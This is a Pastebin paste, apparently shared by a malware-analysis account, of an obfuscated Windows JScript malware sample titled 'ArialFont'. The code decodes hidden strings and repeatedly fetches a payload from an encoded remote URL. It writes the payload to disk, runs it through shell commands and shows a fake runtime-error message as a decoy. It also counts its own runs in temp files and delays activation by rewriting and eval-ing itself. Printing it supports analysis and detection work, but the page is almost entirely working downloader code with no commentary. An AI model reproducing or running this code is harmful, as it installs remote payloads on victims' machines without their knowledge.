MalwareBreakdown

Obfuscated ArialFont JScript file

Jun 5th, 2017
2,285
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1.     var bfefbdcfdfcdc = new ActiveXObject('Scripting.FileSystemObject');
 2.    
 3.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt')){
 4.         bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 5.         Wscript.echo('efefbccbda');
 6.        
 7.         Wscript.echo('efefbccbda');
 8.        
 9.         Wscript.echo('efefbccbda');
 10.     }
 11.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffcaas.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffcaas.txt');
 12.    
 13.     var fcdedcaefdbdad = bfefbdcfdfcdc.GetSpecialFolder(2);
 14.  
 15.  
 16. /*
 17.  
 18. var ffecbebbafcc = '';
 19. var fdbaeeabf = [];
 20. var badbffbeabd;
 21.  
 22. function fdebeccfdaf(acfddfc) {
 23.     var fdebabbbacf = acfddfc.toString();
 24.     var aedfcafcccfdad = '';
 25.     for (var eadccadbceeaad = 0; eadccadbceeaad < fdebabbbacf.length; eadccadbceeaad += 2)
 26.         aedfcafcccfdad += String.fromCharCode(parseInt(fdebabbbacf.substr(eadccadbceeaad, 2), 16));
 27.     return aedfcafcccfdad;
 28. }
 29.  
 30. function aaafeeffdaf(babbadebba) {
 31.   return !isNaN(parseFloat(babbadebba)) && isFinite(babbadebba);
 32. }
 33.  
 34.  
 35.  
 36. function ddcdafcdac(beeecdadcceacbeeecdadcceac,daedfadcac){
 37.    
 38.    
 39.     for(i=daedfadcac;i>0;i--){
 40.        
 41.         beeecdadcceacbeeecdadcceac = beeecdadcceacbeeecdadcceac - 1;
 42.        
 43.         if(beeecdadcceacbeeecdadcceac<0)beeecdadcceacbeeecdadcceac = 9;
 44.        
 45.     }
 46.  
 47.     return beeecdadcceacbeeecdadcceac;
 48.    
 49.  
 50. }
 51.  
 52.  
 53.  
 54.  
 55. function bcddfeaffacac(sstrstrtbeeecdadcceacr,faeacdaebdbcd){
 56.    
 57.    
 58.    
 59.     var fbdefbadcfecfe = sstrstrtbeeecdadcceacr.length;
 60.    
 61.     var aefacbbaebbffafbe = '';
 62.    
 63.    
 64.     var cebffeccae = 0;
 65.    
 66.     for(var bbffbdbcfed=0;bbffbdbcfed<fbdefbadcfecfe;bbffbdbcfed++){
 67.        
 68.         if(cebffeccae>10)cebffeccae=0;
 69.        
 70.        
 71.         if(aaafeeffdaf(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed))){
 72.        
 73.             aefacbbaebbffafbe = aefacbbaebbffafbe + ddcdafcdac(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed),faeacdaebdbcd[cebffeccae]);
 74.             cebffeccae++;
 75.            
 76.         }else{
 77.            
 78.             aefacbbaebbffafbe = aefacbbaebbffafbe + sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed);
 79.            
 80.         }
 81.        
 82.     }
 83.    
 84.     return aefacbbaebbffafbe;
 85. }
 86.  
 87.  
 88. function ceecacabbad(feccdeaddccda,fdcedeccfccb){
 89.    
 90.     var eaaebfdfeedef = "^DQqM1.c8OnIbg&7:yad2BC!LFPR0l(Ux9SkKpof5G+N4@-zhVw,%3isuvjrt*;WXJAeH)_$ZT6YmE";
 91.     var baefbffba = "";
 92.  
 93.     var addebdcfcfcccc = eaaebfdfeedef.length-1;
 94.  
 95.     var size = feccdeaddccda.length;
 96.  
 97.    
 98.    
 99.     for(var eacecadafbf = 0; eacecadafbf<size ; eacecadafbf++){
 100.        
 101.         var facabcbfcddccbb = eaaebfdfeedef.indexOf(feccdeaddccda.charAt(eacecadafbf));
 102.        
 103.         var eebfdceff = facabcbfcddccbb - fdcedeccfccb;
 104.        
 105.         if(eebfdceff<0){
 106.            
 107.             eebfdceff = addebdcfcfcccc - Math.abs(eebfdceff);
 108.            
 109.             var daedfadcac = addebdcfcfcccc - 1;   
 110.        
 111.             if(eebfdceff==daedfadcac)eebfdceff = eebfdceff + fdcedeccfccb;
 112.            
 113.         }
 114.        
 115.        
 116.         baefbffba = baefbffba + eaaebfdfeedef.charAt(eebfdceff);
 117.     }
 118.    
 119.     return fdebeccfdaf(baefbffba);
 120. }
 121.  
 122.  
 123. var addcfeccbca = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 124. var fcdedcaefdbdad = addcfeccbca.GetSpecialFolder(2);
 125.  
 126.  
 127. var addcfeccbcaDeck = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
 128. var debbcfaaaaffcdbed = addcfeccbcaDeck.SpecialFolders(ceecacabbad('@@YG:iYC:@YP:l',1));
 129. var fcdedcaefdbdadd = debbcfaaaaffcdbed;
 130.  
 131. var cbebdeebffcfcdbeb = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));    
 132.  
 133.  
 134. var efdbceecefe = new ActiveXObject(ceecacabbad('@Q:i:OYQY!iBB^GO@Q@!@OG@G@GlB^iiB^il',1));
 135.  
 136.  
 137. var bdadaffecae = 0;
 138.  
 139. var afcdafafddad = 0;
 140.  
 141. var linksssee = ['YO:@:@:lieBPBP:iYPYBYBYG:BYSY^YYYPB^YiYPYQBPY:Y.:@YGB^:lYO:l'];
 142.  
 143. while(true){
 144.    
 145.     bdadaffecae++;
 146.    
 147.     if(linksssee[afcdafafddad] == undefined)afcdafafddad = 0;
 148.    
 149.    
 150.     try {
 151.    
 152.         efdbceecefe.open(ceecacabbad('@:@GG@',1,1), ceecacabbad(linksssee[afcdafafddad],1)+'?ff'+bdadaffecae, false);
 153.         efdbceecefe.send();
 154.    
 155.  
 156.     } catch(e) {
 157.  
 158.         afcdafafddad++;
 159.         WScript.Sleep(1000);
 160.         continue;
 161.  
 162.     }
 163.    
 164.  
 165.     var feabfebecfd = efdbceecefe.responseText.indexOf('|||');
 166.  
 167.     if( feabfebecfd == -1 ){
 168.        
 169.         afcdafafddad++;
 170.         WScript.Sleep(1000);
 171.         continue;
 172.        
 173.     }
 174.  
 175.    
 176.     if(efdbceecefe.Status == 200)break;
 177. }
 178.  
 179.    var adfeedadcaedff = efdbceecefe.responseText;
 180.    
 181.     adfeedadcaedff = adfeedadcaedff.split(ceecacabbad(':!:!:!',1));
 182.  
 183.     var bfdfdcdcebbbaed = adfeedadcaedff[0].split(ceecacabbad('B!',1));
 184.    
 185.  
 186.    
 187. ffecbebbafcc = bcddfeaffacac(adfeedadcaedff[1],bfdfdcdcebbbaed);
 188.    
 189. var fddcebbfafaooo = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 190.    
 191. var  fdbaeeabf = [];
 192.  
 193.  
 194.  
 195. for(var bbffbdbcfed=0; bbffbdbcfed< ffecbebbafcc.length-1; bbffbdbcfed+=2){
 196.     fdbaeeabf.push(parseInt(ffecbebbafcc.substr(bbffbdbcfed, 2), 16));
 197. }
 198.  
 199. badbffbeabd = String.fromCharCode.apply(String, fdbaeeabf);
 200.  
 201.  
 202. function cceaafdcfbcdcb(abafaabfdcfedc){
 203.  
 204.  
 205. var bcafececaae = abafaabfdcfedc;
 206. var ddbeeecedcdc = new ActiveXObject(ceecacabbad('@.@@@P@@@BB^Gi:@:BYGY.YQ',1));
 207. ddbeeecedcdc.Type = 2;
 208. ddbeeecedcdc.Charset = 'ISO-8859-1';
 209. ddbeeecedcdc.Open();
 210. ddbeeecedcdc.WriteText(bcafececaae);
 211. ddbeeecedcdc.SaveToFile(fcdedcaefdbdadd + '/' +ceecacabbad('iiiYY@i@B^YG:OYG',1), 2);
 212. ddbeeecedcdc.Close();
 213.  
 214. }
 215.  
 216.  
 217.  
 218.  
 219.  
 220. cceaafdcfbcdcb(badbffbeabd);
 221.  
 222.  
 223.    var fddcebbfafa = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 224.    
 225.  
 226.     var abaffdddbeafbacb = fddcebbfafa.FileExists(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
 227.    
 228.     var bedbcafcabb = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
 229.            
 230.        
 231.    
 232.  
 233. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGCGeYPY^YGG@:BY.Y^:iYYYG:BGQi^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
 234.  
 235. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGeYPY^YG@SY@iQiBi^i^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
 236.  
 237.    
 238. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1),0,false);
 239.  
 240.  
 241.    
 242.    
 243.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
 244.  
 245.     fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'fbdefbadcfecfeer.txt');
 246.     if(abaffdddbeafbacb)fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
 247.    
 248.     WScript.Quit();
 249.    
 250.     */
 251.    
 252.     function ceaeaaecefa(fcbbdfd){
 253.        
 254.  
 255.         var dfedaddbdfeed = new ActiveXObject('Scripting.FileSystemObject');
 256.        
 257.         var ecefcbacedebfda = fcbbdfd;
 258.        
 259.         var bcbdbacebfbeecff = ecefcbacedebfda;
 260.    
 261.         var fadefbfedbfcaa = dfedaddbdfeed.OpenTextFile(bcbdbacebfbeecff, 1);
 262.        
 263.         var fffbcaecdacedf =  fadefbfedbfcaa.ReadAll();
 264.                
 265.         fadefbfedbfcaa.Close();
 266.        
 267.         return fffbcaecdacedf;
 268.        
 269.     }
 270.  
 271.    
 272.    var fbdefbadcfecfe = 0;
 273.    var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt');
 274.    if(abaffdddbeafbacb == true){
 275.     var fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 1,1);
 276.     fbdefbadcfecfe = fcbbfeadfdadb.ReadAll();
 277.             fcbbfeadfdadb.Close();
 278.    }
 279.     fbdefbadcfecfe = parseInt(fbdefbadcfecfe) +1;
 280.    
 281. if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc3.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc3.txt');
 282.    
 283.     fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 2,1);
 284.    
 285.     fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
 286.     fcbbfeadfdadb.Close();
 287.    
 288.     var caecebcfccacab = WScript.ScriptFullName;
 289.     var feeddabdbddfb = ceaeaaecefa(caecebcfccacab);
 290.    
 291.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc.txt');
 292.    
 293.     if(fbdefbadcfecfe==4){
 294.        
 295.        
 296.         fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', 2,1);
 297.        
 298.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 299.        
 300.         fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
 301.         fcbbfeadfdadb.Close();
 302.        
 303.     }
 304.    
 305.     if(fbdefbadcfecfe==5){
 306.        
 307.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg');
 308.         bfefbdcfdfcdc.MoveFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
 309.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 310.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 311.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 312.        
 313.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 314.        
 315.  
 316.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 317.    
 318.         feeddabdbddfb = feeddabdbddfb.replace('/*','').replace('*/', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '');
 319.     }
 320.    
 321.    
 322.  
 323.     var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
 324.  
 325.      if(abaffdddbeafbacb == true){
 326.        
 327.        eval(feeddabdbddfb);
 328.        
 329.     }
 330.  
 331.    
 332.     eval(feeddabdbddfb);
RAW Paste Data